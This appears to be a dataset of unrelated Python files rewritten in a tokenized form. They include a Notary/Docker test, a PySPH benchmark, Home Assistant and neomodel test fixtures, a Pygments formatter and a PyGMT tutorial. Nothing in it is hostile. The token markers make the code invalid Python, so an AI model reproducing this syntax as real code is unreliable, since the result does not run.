"""<line_sep>run_cmd("{notary}{debug} -d {trustdir} key rotate {gun} snapshot -r".format(notary=NOTARY_CLIENT trustdir=_TRUST_DIR gun=image debug=DEBUG) fout input=get_notary_usernamepass())<line_sep>run_cmd("{notary}{debug} -d {trustdir} publish {gun}".format(notary=NOTARY_CLIENT trustdir=_TRUST_DIR gun=image debug=DEBUG) fout input=get_notary_usernamepass())<block_end><def_stmt>test_all_docker_versions <block_start>"""
Initialize a repo with each docker version, and test that other docker
versions can read/write to it.
"""<line_sep>print("Output files at" _TEMPDIR)<line_sep>results=OrderedDict()<for_stmt>docker_version DOCKERS<block_start>clear_keys()<line_sep># test with just creating a regular repo
result=test_docker_version(docker_version)<line_sep>print("\nRepo created with docker {0}:".format(docker_version))<line_sep>print(json.dumps(result indent=2))<line_sep>results[docker_version]=result<line_sep># do snapshot rotation after creating the repo, and see if it's still ok
repo_name="repo_by_{0}_snapshot_rotation".format(docker_version)<line_sep>result=test_docker_version(docker_version repo_name=repo_name do_after_first_push=rotate_to_server_snapshot)<line_sep>print("\nRepo created with docker {0} and snapshot key rotated:".format(docker_version))<line_sep>print(json.dumps(result indent=2))<line_sep>results[docker_version+"_snapshot_rotation"]=result<block_end><with_stmt>open(os.path.join(_TEMPDIR "total_results.json") 'wb')<as>fout<block_start>json.dump(results fout indent=2)<block_end>print("\n\nFinal results:")<line_sep>results["output_dir"]=_TEMPDIR<line_sep>print(json.dumps(results indent=2))<block_end><if_stmt>__name__<eq>"__main__"<block_start>setup()<line_sep>test_all_docker_versions()<block_end>
|
"""SPHERIC benchmark case 6. (2 hours)
See http://spheric-sph.org/tests/test-6 for more details.
"""<line_sep># math
<import_from_stmt>math exp<line_sep># PySPH imports
<import_from_stmt>pysph.base.utils get_particle_array<import_from_stmt>pysph.base.kernels QuinticSpline<import_from_stmt>pysph.solver.solver Solver<import_from_stmt>pysph.solver.application Application<import_from_stmt>pysph.sph.integrator_step TwoStageRigidBodyStep TransportVelocityStep<import_from_stmt>pysph.sph.integrator Integrator<import_from_stmt>pysph.tools uniform_distribution<line_sep># SPH equations for this problem
<import_from_stmt>pysph.sph.equation Group Equation<import_from_stmt>pysph.sph.wc.transport_velocity SummationDensity StateEquation MomentumEquationPressureGradient MomentumEquationViscosity MomentumEquationArtificialStress SolidWallPressureBC SolidWallNoSlipBC SetWallVelocity<line_sep># domain and reference values
Lx=10.0<line_sep>Ly=5.0<line_sep>Umax=1.0<line_sep>c0=25.0<times>Umax<line_sep>rho0=1.0<line_sep>p0=c0<times>c0<times>rho0<line_sep># obstacle dimensions
obstacle_width=1.0<line_sep>obstacle_height=1.0<line_sep># Reynolds number and kinematic viscosity
Re=150<line_sep>nu=Umax<times>obstacle_width/Re<line_sep># Numerical setup
nx=50<line_sep>dx=0.20<times>Lx/nx<line_sep>nghost_layers=4<line_sep>ghost_extent=nghost_layers<times>dx<line_sep>hdx=1.2<line_sep># adaptive time steps
h0=hdx<times>dx<line_sep>dt_cfl=0.25<times>h0/(c0+Umax)<line_sep>dt_viscous=0.125<times>h0<power>2/nu<line_sep>dt_force=1.0<line_sep>tf=8.0<line_sep>dt=0.8<times>min(dt_cfl dt_viscous dt_force)<class_stmt>SPHERICBenchmarkAcceleration(Equation)<block_start>r"""Equation to set the acceleration for the moving square
benchmark problem.
We use scipy.optimize to fit the Gaussian:
.. math::
a \exp( -\frac{(t-b)^2}{2c^2} ) + d
to the SPHERIC Motion.dat file. The values for the parameters are
a = 2.8209512
b = 0.525652151
c = 0.14142151
d = -2.55580905e-08
Notes:
This equation must be instantiated with no sources
"""<def_stmt>loop self d_idx d_au t=0.0<block_start>a=2.8209512<line_sep>b=0.525652151<line_sep>c=0.14142151<line_sep>d=-2.55580905e-08<line_sep># compute the acceleration and set it for the destination
d_au[d_idx]=a<times>exp(-(t-b)<times>(t-b)/(2.0<times>c<times>c))+d<block_end><block_end><def_stmt>_get_interior x y<block_start>indices=[]<for_stmt>i range(x.size)<block_start><if_stmt>((x[i]<g>0.0)<and>(x[i]<l>Lx))<block_start><if_stmt>((y[i]<g>0.0)<and>(y[i]<l>Ly))<block_start>indices.append(i)<block_end><block_end><block_end><return>indices<block_end><def_stmt>_get_obstacle x y<block_start>indices=[]<for_stmt>i range(x.size)<block_start><if_stmt>((1.0<le>x[i]<le>2.0)<and>(2.0<le>y[i]<le>3.0))<block_start>indices.append(i)<block_end><block_end><return>indices<block_end><class_stmt>MovingSquare(Application)<block_start><def_stmt>_setup_particle_properties self particles volume<block_start>fluid,solid,obstacle=particles<line_sep>#### ADD PROPS FOR THE PARTICLES ###
# volume from number density
fluid.add_property('V')<line_sep>solid.add_property('V')<line_sep>obstacle.add_property('V')<line_sep># extrapolated velocities for the fluid
<for_stmt>name ['uf' 'vf' 'wf']<block_start>solid.add_property(name)<line_sep>obstacle.add_property(name)<block_end># dummy velocities for the solid and obstacle
# required for the no-slip BC
<for_stmt>name ['ug' 'vg' 'wg']<block_start>solid.add_property(name)<line_sep>obstacle.add_property(name)<block_end># advection velocities and accelerations for fluid
<for_stmt>name ('uhat' 'vhat' 'what' 'auhat' 'avhat' 'awhat' 'au' 'av' 'aw')<block_start>fluid.add_property(name)<block_end># kernel summation correction for solids
solid.add_property('wij')<line_sep>obstacle.add_property('wij')<line_sep># initial velocities and positions needed for the obstacle for
# rigid-body integration
obstacle.add_property('u0')<line_sep>obstacle.u0[:]=0.<line_sep>obstacle.add_property('v0')<line_sep>obstacle.v0[:]=0.<line_sep>obstacle.add_property('w0')<line_sep>obstacle.w0[:]=0.<line_sep>obstacle.add_property('x0')<line_sep>obstacle.add_property('y0')<line_sep>obstacle.add_property('z0')<line_sep># imposed accelerations on the solid and obstacle
solid.add_property('ax')<line_sep>solid.add_property('ay')<line_sep>solid.add_property('az')<line_sep>obstacle.add_property('ax')<line_sep>obstacle.add_property('ay')<line_sep>obstacle.add_property('az')<line_sep># magnitude of velocity squared
fluid.add_property('vmag2')<line_sep>#### SETUP PARTICLE PROPERTIES ###
# mass is set to get the reference density of rho0
fluid.m[:]=volume<times>rho0<line_sep>solid.m[:]=volume<times>rho0<line_sep>obstacle.m[:]=volume<times>rho0<line_sep># volume is set as dx^2
fluid.V[:]=1./volume<line_sep>solid.V[:]=1./volume<line_sep>obstacle.V[:]=1./volume<line_sep># smoothing lengths
fluid.h[:]=h0<line_sep>solid.h[:]=h0<line_sep>obstacle.h[:]=h0<line_sep># set the output arrays
fluid.set_output_arrays(['x' 'y' 'u' 'v' 'vmag2' 'rho' 'p' 'V' 'm' 'h'])<line_sep>solid.set_output_arrays(['x' 'y' 'rho' 'p'])<line_sep>obstacle.set_output_arrays(['x' 'y' 'u0' 'rho' 'p' 'u'])<line_sep>particles=[fluid solid obstacle]<line_sep><return>particles<block_end><def_stmt>add_user_options self group<block_start>group.add_argument("--hcp" action="store_true" dest="hcp" default=<false> help="Use hexagonal close packing of particles.")<block_end><def_stmt>create_particles self<block_start>hcp=self.options.hcp<line_sep># Initial distribution using Hexagonal close packing of particles
# create all particles
<global>dx<if_stmt>hcp<block_start>x,y,dx,dy,xmin,xmax,ymin,ymax=uniform_distribution.uniform_distribution_hcp2D(dx=dx xmin=-ghost_extent xmax=Lx+ghost_extent ymin=-ghost_extent ymax=Ly+ghost_extent)<block_end><else_stmt><block_start>x,y,dx,dy,xmin,xmax,ymin,ymax=uniform_distribution.uniform_distribution_cubic2D(dx=dx xmin=-ghost_extent xmax=Lx+ghost_extent ymin=-ghost_extent ymax=Ly+ghost_extent)<block_end>x=x.ravel()<line_sep>y=y.ravel()<line_sep># create the basic particle array
solid=get_particle_array(name='solid' x=x y=y)<line_sep># now sort out the interior from all particles
indices=_get_interior(solid.x solid.y)<line_sep>fluid=solid.extract_particles(indices)<line_sep>fluid.set_name('fluid')<line_sep>solid.remove_particles(indices)<line_sep># sort out the obstacle from the interior
indices=_get_obstacle(fluid.x fluid.y)<line_sep>obstacle=fluid.extract_particles(indices)<line_sep>obstacle.set_name('obstacle')<line_sep>fluid.remove_particles(indices)<line_sep>print("SPHERIC benchmark 6 :: Re = %d, nfluid = %d, nsolid=%d, nobstacle = %d, dt = %g"%(Re fluid.get_number_of_particles() solid.get_number_of_particles() obstacle.get_number_of_particles() dt))<line_sep># setup requisite particle properties and initial conditions
<if_stmt>hcp<block_start>wij_sum=uniform_distribution.get_number_density_hcp(dx dy kernel h0)<line_sep>volume=1./wij_sum<block_end><else_stmt><block_start>volume=dx<times>dy<block_end>particles=self._setup_particle_properties([fluid solid obstacle] volume=volume)<line_sep><return>particles<block_end><def_stmt>create_solver self<block_start>kernel=QuinticSpline(dim=2)<line_sep>integrator=Integrator(fluid=TransportVelocityStep() obstacle=TwoStageRigidBodyStep())<line_sep>solver=Solver(kernel=kernel dim=2 integrator=integrator tf=tf dt=dt adaptive_timestep=<false> output_at_times=[1.0 2.0 3.0 4.0 5.0 6.0 7.0])<line_sep><return>solver<block_end><def_stmt>create_equations self<block_start>equations=[# set the acceleration for the obstacle using the special function
# mimicking the accelerations provided in the test.
Group(equations=[SPHERICBenchmarkAcceleration(dest='obstacle' sources=<none>) ] real=<false>) # Summation density along with volume summation for the fluid
# phase. This is done for all local and remote particles. At the
# end of this group, the fluid phase has the correct density
# taking into consideration the fluid and solid
# particles.
Group(equations=[SummationDensity(dest='fluid' sources=['fluid' 'solid' 'obstacle']) ] real=<false>) # Once the fluid density is computed, we can use the EOS to set
# the fluid pressure. Additionally, the dummy velocity for the
# channel is set, which is later used in the no-slip wall BC.
Group(equations=[StateEquation(dest='fluid' sources=<none> p0=p0 rho0=rho0 b=1.0) SetWallVelocity(dest='solid' sources=['fluid']) SetWallVelocity(dest='obstacle' sources=['fluid']) ] real=<false>) # Once the pressure for the fluid phase has been updated, we can
# extrapolate the pressure to the ghost particles. After this
# group, the fluid density, pressure and the boundary pressure has
# been updated and can be used in the integration equations.
Group(equations=[SolidWallPressureBC(dest='obstacle' sources=['fluid'] b=1.0 rho0=rho0 p0=p0) SolidWallPressureBC(dest='solid' sources=['fluid'] b=1.0 rho0=rho0 p0=p0) ] real=<false>) # The main accelerations block. The acceleration arrays for the
# fluid phase are upadted in this stage for all local particles.
Group(equations=[# Pressure gradient terms
MomentumEquationPressureGradient(dest='fluid' sources=['fluid' 'solid' 'obstacle'] pb=p0) # fluid viscosity
MomentumEquationViscosity(dest='fluid' sources=['fluid'] nu=nu) # No-slip boundary condition. This is effectively a
# viscous interaction of the fluid with the ghost
# particles.
SolidWallNoSlipBC(dest='fluid' sources=['solid' 'obstacle'] nu=nu) # Artificial stress for the fluid phase
MomentumEquationArtificialStress(dest='fluid' sources=['fluid']) ] real=<true>) ]<line_sep><return>equations<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app=MovingSquare()<line_sep>app.run()<block_end>
|
# Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
# for autocomplete on builtins
#from warp.stubs import *
<import_from_stmt>warp.types array array2d array3d array4d constant<import_from_stmt>warp.types int8 uint8 int16 uint16 int32 uint32 int64 uint64 float32 float64<import_from_stmt>warp.types vec2 vec3 vec4 mat22 mat33 mat44 quat transform spatial_vector spatial_matrix<import_from_stmt>warp.types Mesh HashGrid Volume<import_from_stmt>warp.context init func kernel runtime<import_from_stmt>warp.context is_cpu_available is_cuda_available is_device_available<import_from_stmt>warp.context get_devices get_preferred_device<import_from_stmt>warp.context zeros zeros_like clone empty empty_like copy from_numpy launch synchronize force_load<import_from_stmt>warp.context set_module_options get_module_options get_module<import_from_stmt>warp.context capture_begin capture_end capture_launch<import_from_stmt>warp.context print_builtins export_builtins export_stubs<import_from_stmt>warp.context Kernel Function<import_stmt>warp.builtins<import_from_stmt>warp.tape Tape<import_from_stmt>warp.utils ScopedTimer ScopedCudaGuard<import_from_stmt>warp.utils transform_expand<line_sep># optional on PyTorch being installed
<try_stmt><block_start><import_from_stmt>warp.torch from_torch<import_from_stmt>warp.torch to_torch<block_end><except_stmt>ModuleNotFoundError<block_start><pass><block_end># optional on USD being installed
<try_stmt><block_start><import_stmt>warp.render<block_end><except_stmt>ModuleNotFoundError<block_start><pass><block_end>
|
"""Fixtures for Luftdaten tests."""<import_from_future_stmt> annotations<import_from_stmt>collections.abc Generator<import_from_stmt>unittest.mock MagicMock patch<import_stmt>pytest<import_from_stmt>homeassistant.components.luftdaten.const CONF_SENSOR_ID DOMAIN<import_from_stmt>homeassistant.const CONF_SHOW_ON_MAP<import_from_stmt>homeassistant.core HomeAssistant<import_from_stmt>tests.common MockConfigEntry<line_sep>@pytest.fixture<def_stmt>mock_config_entry <arrow>MockConfigEntry<block_start>"""Return the default mocked config entry."""<line_sep><return>MockConfigEntry(title="12345" domain=DOMAIN data={CONF_SENSOR_ID:12345 CONF_SHOW_ON_MAP:<true>} unique_id="12345" )<block_end>@pytest.fixture<def_stmt>mock_setup_entry <arrow>Generator[<none> <none> <none>]<block_start>"""Mock setting up a config entry."""<with_stmt>patch("homeassistant.components.luftdaten.async_setup_entry" return_value=<true>)<block_start><yield><block_end><block_end>@pytest.fixture<def_stmt>mock_luftdaten_config_flow <arrow>Generator[<none> MagicMock <none>]<block_start>"""Return a mocked Luftdaten client."""<with_stmt>patch("homeassistant.components.luftdaten.config_flow.Luftdaten" autospec=<true>)<as>luftdaten_mock<block_start>luftdaten=luftdaten_mock.return_value<line_sep>luftdaten.validate_sensor.return_value=<true><line_sep><yield>luftdaten<block_end><block_end>@pytest.fixture<def_stmt>mock_luftdaten <arrow>Generator[<none> MagicMock <none>]<block_start>"""Return a mocked Luftdaten client."""<with_stmt>patch("homeassistant.components.luftdaten.Luftdaten" autospec=<true>)<as>luftdaten_mock<block_start>luftdaten=luftdaten_mock.return_value<line_sep>luftdaten.sensor_id=12345<line_sep>luftdaten.meta={"altitude":123.456 "latitude":56.789 "longitude":12.345 "sensor_id":12345 }<line_sep>luftdaten.values={"humidity":34.70 "P1":8.5 "P2":4.07 "pressure_at_sealevel":103102.13 "pressure":98545.00 "temperature":22.30 }<line_sep><yield>luftdaten<block_end><block_end>@pytest.fixture<async_keyword><def_stmt>init_integration hass:HomeAssistant mock_config_entry:MockConfigEntry mock_luftdaten:MagicMock<arrow>MockConfigEntry<block_start>"""Set up the Luftdaten integration for testing."""<line_sep>mock_config_entry.add_to_hass(hass)<line_sep><await>hass.config_entries.async_setup(mock_config_entry.entry_id)<line_sep><await>hass.async_block_till_done()<line_sep><return>mock_config_entry<block_end>
|
# Copyright (c) Facebook, Inc. and its affiliates.
<import_from_stmt>. register_ade20k_full register_ade20k_panoptic register_coco_stuff_10k register_mapillary_vistas <line_sep>
|
"""
A full binary tree is a tree which has either 0 children or 2 children
"""<class_stmt>Node<block_start><def_stmt>__init__ self val<block_start>self.val=val<line_sep>self.left=<none><line_sep>self.right=<none><block_end><block_end><def_stmt>check root<block_start><if_stmt><not>root<block_start><return><true><block_end><if_stmt><not>root.left<and><not>root.right<block_start><return><true><block_end><if_stmt>root.left<and>root.right<block_start><return>check(root.left)<and>check(root.right)<block_end><block_end>root=Node(0)<line_sep>root.left=Node(1)<line_sep>root.right=Node(2)<if_stmt>check(root)<block_start>print('True')<block_end><else_stmt><block_start>print("False")<block_end>
|
<import_from_stmt>rest_framework.serializers ModelSerializer<import_from_stmt>django_jalali.serializers.serializerfield JDateField JDateTimeField <import_from_stmt>.models Bar BarTime<class_stmt>JDateFieldSerializer(ModelSerializer)<block_start>date=JDateField()<class_stmt>Meta<block_start>model=Bar<line_sep>exclude=[]<block_end><block_end><class_stmt>JDateTimeFieldSerializer(ModelSerializer)<block_start>datetime=JDateTimeField()<class_stmt>Meta<block_start>model=BarTime<line_sep>exclude=[]<block_end><block_end>
|
<import_from_future_stmt> print_function<import_stmt>warnings<import_stmt>os<import_stmt>sys<import_stmt>pytest<import_from_stmt>neomodel config db clear_neo4j_database change_neo4j_password<import_from_stmt>neo4j.exceptions ClientError<as>CypherError<import_from_stmt>neobolt.exceptions ClientError<def_stmt>pytest_addoption parser<block_start>"""
Adds the command line option --resetdb.
:param parser: The parser object. Please see <https://docs.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_addoption>`_
:type Parser object: For more information please see <https://docs.pytest.org/en/latest/reference.html#_pytest.config.Parser>`_
"""<line_sep>parser.addoption("--resetdb" action="store_true" help="Ensures that the database is clear prior to running tests for neomodel" default=<false>)<block_end><def_stmt>pytest_sessionstart session<block_start>"""
Provides initial connection to the database and sets up the rest of the test suite
:param session: The session object. Please see <https://docs.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_sessionstart>`_
:type Session object: For more information please see <https://docs.pytest.org/en/latest/reference.html#session>`_
"""<line_sep>warnings.simplefilter('default')<line_sep>config.DATABASE_URL=os.environ.get('NEO4J_BOLT_URL' 'bolt://neo4j:foobar@localhost:7687')<line_sep>config.AUTO_INSTALL_LABELS=<true><try_stmt># Clear the database if required
<block_start>database_is_populated,_=db.cypher_query("MATCH (a) return count(a)>0 as database_is_populated")<if_stmt>database_is_populated[0][0]<and><not>session.config.getoption("resetdb")<block_start><raise>SystemError("Please note: The database seems to be populated.\n\tEither delete all nodes and edges manually, or set the --resetdb parameter when calling pytest\n\n\tpytest --resetdb.")<block_end><else_stmt><block_start>clear_neo4j_database(db clear_constraints=<true> clear_indexes=<true>)<block_end><block_end><except_stmt>(CypherError ClientError)<as>ce# Handle instance without password being changed
<block_start><if_stmt>'The credentials you provided were valid, but must be changed before you can use this instance'<in>str(ce)<block_start>warnings.warn("New database with no password set, setting password to '<PASSWORD>'")<try_stmt><block_start>change_neo4j_password(db 'test')<line_sep># Ensures that multiprocessing tests can use the new password
config.DATABASE_URL='bolt://neo4j:test@localhost:7687'<line_sep>db.set_connection('bolt://neo4j:test@localhost:7687')<line_sep>warnings.warn("Please 'export NEO4J_BOLT_URL=bolt://neo4j:test@localhost:7687' for subsequent test runs")<block_end><except_stmt>(CypherError ClientError)<as>e<block_start><if_stmt>'The credentials you provided were valid, but must be changed before you can use this instance'<in>str(e)<block_start>warnings.warn("You appear to be running on version 4.0+ of Neo4j, without having changed the password."<concat>"Please manually log in, change your password, then update the config.DATABASE_URL call at line 32 in this file")<block_end><else_stmt><block_start><raise>e<block_end><block_end><block_end><else_stmt><block_start><raise>ce<block_end><block_end><block_end><def_stmt>version_to_dec a_version_string<block_start>"""
Converts a version string to a number to allow for quick checks on the versions of specific components.
:param a_version_string: The version string under test (e.g. '3.4.0')
:type a_version_string: str
:return: An integer representation of the string version, e.g. '3.4.0' --> 340
"""<line_sep>components=a_version_string.split('.')<while_stmt>len(components)<l>3<block_start>components.append('0')<block_end>num=0<for_stmt>a_component enumerate(components)<block_start>num<augadd>(10<power>((len(components)-1)-a_component[0]))<times>int(a_component[1])<block_end><return>num<block_end><def_stmt>check_and_skip_neo4j_least_version required_least_neo4j_version message<block_start>"""
Checks if the NEO4J_VERSION is at least `required_least_neo4j_version` and skips a test if not.
WARNING: If the NEO4J_VERSION variable is not set, this function returns True, allowing the test to go ahead.
:param required_least_neo4j_version: The least version to check. This must be the numberic representation of the
version. That is: '3.4.0' would be passed as 340.
:type required_least_neo4j_version: int
:param message: An informative message as to why the calling test had to be skipped.
:type message: str
:return: A boolean value of True if the version reported is at least `required_least_neo4j_version`
"""<if_stmt>'NEO4J_VERSION'<in>os.environ<block_start><if_stmt>version_to_dec(os.environ['NEO4J_VERSION'])<l>required_least_neo4j_version<block_start>pytest.skip('Neo4j version: {}. {}.'<concat>'Skipping test.'.format(os.environ['NEO4J_VERSION'] message))<block_end><block_end><block_end>@pytest.fixture<def_stmt>skip_neo4j_before_330 <block_start>check_and_skip_neo4j_least_version(330 'Neo4J version does not support this test')<block_end>
|
"""lock_labs.py zips and password-protects labs.
$ tools/lock_labs.py
"""<import_from_stmt>absl app<import_from_stmt>pathlib Path<import_stmt>getpass<import_stmt>os<import_stmt>pyminizip<def_stmt>main argv<block_start>password=<none><line_sep>home=str(Path.home())<line_sep>password_file=os.path.join(home '.amli')<if_stmt>os.path.exists(password_file)<block_start><with_stmt>open(password_file)<as>f<block_start>password=f.read().replace('\n' '')<block_end><block_end><else_stmt><block_start>password=getpass.getpass("Password: ")<block_end><for_stmt>root,_,files os.walk('content')<block_start><for_stmt>name files<block_start><if_stmt>name.endswith('-key.ipynb')<block_start>lname=os.path.join(root name)<line_sep>zname=lname.replace('.ipynb' '.zip')<if_stmt>os.path.exists(zname)<block_start>os.remove(zname)<block_end>pyminizip.compress(lname root zname password 0)<line_sep>os.remove(lname)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app.run(main)<block_end>
|
# -*- coding: utf-8 -*-
<import_from_stmt>pygments.formatter Formatter<import_from_stmt>pygments.token Keyword Name Comment String Error Number Operator Generic Token Whitespace <import_from_stmt>pygments.util get_choice_opt<line_sep>COMMAND_COLORS={Token:("" "") Whitespace:("fg=white" "fg=black;options=bold") Comment:("fg=white" "fg=black;options=bold") Comment.Preproc:("fg=cyan" "fg=cyan;options=bold") Keyword:("fg=blue" "fg=blue;options=bold") Keyword.Type:("fg=cyan" "fg=cyan;options=bold") Operator.Word:("fg=magenta" "fg=magenta;options=bold") Name.Builtin:("fg=cyan" "fg=cyan;options=bold") Name.Function:("fg=green" "fg=green;option=bold") Name.Namespace:("fg=cyan;options=underline" "fg=cyan;options=bold,underline") Name.Class:("fg=green;options=underline" "fg=green;options=bold,underline") Name.Exception:("fg=cyan" "fg=cyan;options=bold") Name.Decorator:("fg=black;options=bold" "fg=white") Name.Variable:("fg=red" "fg=red;options=bold") Name.Constant:("fg=red" "fg=red;options=bold") Name.Attribute:("fg=cyan" "fg=cyan;options=bold") Name.Tag:("fg=blue;options=bold" "fg=blue;options=bold") String:("fg=yellow" "fg=yellow") Number:("fg=blue" "fg=blue;options=bold") Generic.Deleted:("fg=red;options=bold" "fg=red;options=bold") Generic.Inserted:("fg=green" "fg=green;options=bold") Generic.Heading:("options=bold" "option=bold") Generic.Subheading:("fg=magenta;options=bold" "fg=magenta;options=bold") Generic.Prompt:("options=bold" "options=bold") Generic.Error:("fg=red;options=bold" "fg=red;options=bold") Error:("fg=red;options=bold,underline" "fg=red;options=bold,underline") }<class_stmt>CommandFormatter(Formatter)<block_start>r"""
Format tokens with Cleo color sequences, for output in a text console.
Color sequences are terminated at newlines, so that paging the output
works correctly.
The `get_style_defs()` method doesn't do anything special since there is
no support for common styles.
Options accepted:
`bg`
Set to ``"light"`` or ``"dark"`` depending on the terminal's background
(default: ``"light"``).
`colorscheme`
A dictionary mapping token types to (lightbg, darkbg) color names or
``None`` (default: ``None`` = use builtin colorscheme).
`linenos`
Set to ``True`` to have line numbers on the terminal output as well
(default: ``False`` = no line numbers).
"""<line_sep>name="Command"<line_sep>aliases=["command"]<line_sep>filenames=[]<def_stmt>__init__ self **options<block_start>Formatter.__init__(self **options)<line_sep>self.darkbg=(get_choice_opt(options "bg" ["light" "dark"] "light")<eq>"dark")<line_sep>self.colorscheme=options.get("colorscheme" <none>)<or>COMMAND_COLORS<line_sep>self.linenos=options.get("linenos" <false>)<line_sep>self._lineno=0<block_end><def_stmt>format self tokensource outfile<block_start><return>Formatter.format(self tokensource outfile)<block_end><def_stmt>_write_lineno self outfile<block_start>self._lineno<augadd>1<line_sep>outfile.write("%s%04d: "%(self._lineno<ne>1<and>"\n"<or>"" self._lineno))<block_end><def_stmt>_get_color self ttype# self.colorscheme is a dict containing usually generic types, so we
# have to walk the tree of dots. The base Token type must be a key,
# even if it's empty string, as in the default above.
<block_start>colors=self.colorscheme.get(ttype)<while_stmt>colors<is><none><block_start>ttype=ttype.parent<line_sep>colors=self.colorscheme.get(ttype)<block_end><return>colors[self.darkbg]<block_end><def_stmt>format_unencoded self tokensource outfile<block_start><if_stmt>self.linenos<block_start>self._write_lineno(outfile)<block_end><for_stmt>ttype,value tokensource<block_start>color=self._get_color(ttype)<for_stmt>line value.splitlines(<true>)<block_start><if_stmt>color<block_start>outfile.write("<%s>%s</>"%(color line.rstrip("\n")))<block_end><else_stmt><block_start>outfile.write(line.rstrip("\n"))<block_end><if_stmt>line.endswith("\n")<block_start><if_stmt>self.linenos<block_start>self._write_lineno(outfile)<block_end><else_stmt><block_start>outfile.write("\n")<block_end><block_end><block_end><block_end><if_stmt>self.linenos<block_start>outfile.write("\n")<block_end><block_end><block_end>
|
"""
Configuring PyGMT defaults
==========================
Default GMT parameters can be set globally or locally using
:class:`pygmt.config`.
"""<line_sep># sphinx_gallery_thumbnail_number = 3
<import_stmt>pygmt<line_sep>###############################################################################
# Configuring default GMT parameters
# ----------------------------------
#
# Users can override default parameters either temporarily (locally) or
# permanently (globally) using :meth:`pygmt.config`. The full list of default
# parameters that can be changed can be found at :gmt-docs:`gmt.conf.html`.
#
# We demonstrate the usage of :meth:`pygmt.config` by configuring a map plot.
# Start with a basic figure with the default style
fig=pygmt.Figure()<line_sep>fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<line_sep>fig.coast(land="black" water="skyblue")<line_sep>fig.show()<line_sep>###############################################################################
# Globally overriding defaults
# ----------------------------
#
# The ``MAP_FRAME_TYPE`` parameter specifies the style of map frame to use, of
# which there are 5 options: ``fancy`` (default, seen above), ``fancy+``,
# ``plain``, ``graph`` (which does not apply to geographical maps) and
# ``inside``.
#
# The ``FORMAT_GEO_MAP`` parameter controls the format of geographical tick
# annotations. The default uses degrees and minutes. Here we specify the ticks
# to be a decimal number of degrees.
fig=pygmt.Figure()<line_sep># Configuration for the 'current figure'.
pygmt.config(MAP_FRAME_TYPE="plain")<line_sep>pygmt.config(FORMAT_GEO_MAP="ddd.xx")<line_sep>fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<line_sep>fig.coast(land="black" water="skyblue")<line_sep>fig.show()<line_sep>###############################################################################
# Locally overriding defaults
# ---------------------------
#
# It is also possible to temporarily override the default parameters, which is
# very useful for limiting the scope of changes to a particular plot.
# :class:`pygmt.config` is implemented as a context manager, which handles the
# setup and teardown of a GMT session. Python users are likely familiar with
# the ``with open(...) as file:`` snippet, which returns a ``file`` context
# manager. In this way, it can be used to override a parameter for a single
# command, or a sequence of commands. An application of :class:`pygmt.config`
# as a context manager is shown below:
fig=pygmt.Figure()<line_sep># This will have a fancy+ frame
<with_stmt>pygmt.config(MAP_FRAME_TYPE="fancy+")<block_start>fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<block_end>fig.coast(land="black" water="skyblue")<line_sep># Shift plot origin down by 10cm to plot another map
fig.shift_origin(yshift="-10c")<line_sep># This figure retains the default "fancy" frame
fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<line_sep>fig.coast(land="black" water="skyblue")<line_sep>fig.show()<line_sep>
|
# <NAME>
# http://gumuz.looze.net/
<def_stmt>split_seq seq size<block_start>""" Split up seq in pieces of size """<line_sep><return>[seq[i:i+size]<for>i range(0 len(seq) size)]<block_end>
|
<import_stmt>argparse<import_stmt>os<import_stmt>shutil<import_stmt>types<import_from_stmt>colmap_utils generate_empty_reconstruction import_features triangulate<def_stmt>parse_args <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--dataset_path' type=str required=<true> help='path to the dataset')<line_sep>parser.add_argument('--colmap_path' type=str required=<true> help='path to the COLMAP executable folder')<line_sep>parser.add_argument('--method_name' type=str required=<true> help='name of the method')<line_sep>parser.add_argument('--matches_file' type=str required=<true> help='path to the matches file')<line_sep>parser.add_argument('--solution_file' type=str default=<none> help='path to the multi-view optimization solution file (leave None for no refinement)')<line_sep>args=parser.parse_args()<line_sep><return>args<block_end><if_stmt>__name__<eq>"__main__"<block_start>args=parse_args()<line_sep>refine=(args.solution_file<is><not><none>)<line_sep># Create the extra paths.
paths=types.SimpleNamespace()<line_sep>paths.database_path=os.path.join(args.dataset_path '%s-%s.db'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep>paths.image_path=os.path.join(args.dataset_path 'images')<line_sep>paths.reference_model_path=os.path.join(args.dataset_path 'dslr_calibration_undistorted')<line_sep>paths.match_list_path=os.path.join(args.dataset_path 'match-list.txt')<line_sep>paths.empty_model_path=os.path.join(args.dataset_path 'sparse-%s-%s-empty'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep>paths.model_path=os.path.join(args.dataset_path 'sparse-%s-%s'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep>paths.ply_model_path=os.path.join(args.dataset_path 'sparse-%s-%s.ply'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep># Create a copy of the dummy database.
<if_stmt>os.path.exists(paths.database_path)<block_start><raise>FileExistsError('The database file already exists.')<block_end>shutil.copyfile(os.path.join(args.dataset_path 'database.db') paths.database_path)<line_sep># Reconstruction pipeline.
_=generate_empty_reconstruction(paths.reference_model_path paths.empty_model_path)<line_sep>import_features(args.colmap_path args.method_name paths.database_path paths.image_path paths.match_list_path args.matches_file args.solution_file)<line_sep>triangulate(args.colmap_path paths.database_path paths.image_path paths.empty_model_path paths.model_path paths.ply_model_path)<block_end>
|
#pylint: disable=invalid-name,missing-docstring
# Basic test with a list
TEST_LIST1=['a'<concat>'b']# [implicit-str-concat]
# Testing with unicode strings in a tuple, with a comma AFTER concatenation
TEST_LIST2=(u"a"<concat>u"b" u"c")# [implicit-str-concat]
# Testing with raw strings in a set, with a comma BEFORE concatenation
TEST_LIST3={r'''a''' r'''b'''<concat>r'''c'''}# [implicit-str-concat]
# Testing that only ONE warning is generated when string concatenation happens
# in the middle of a list
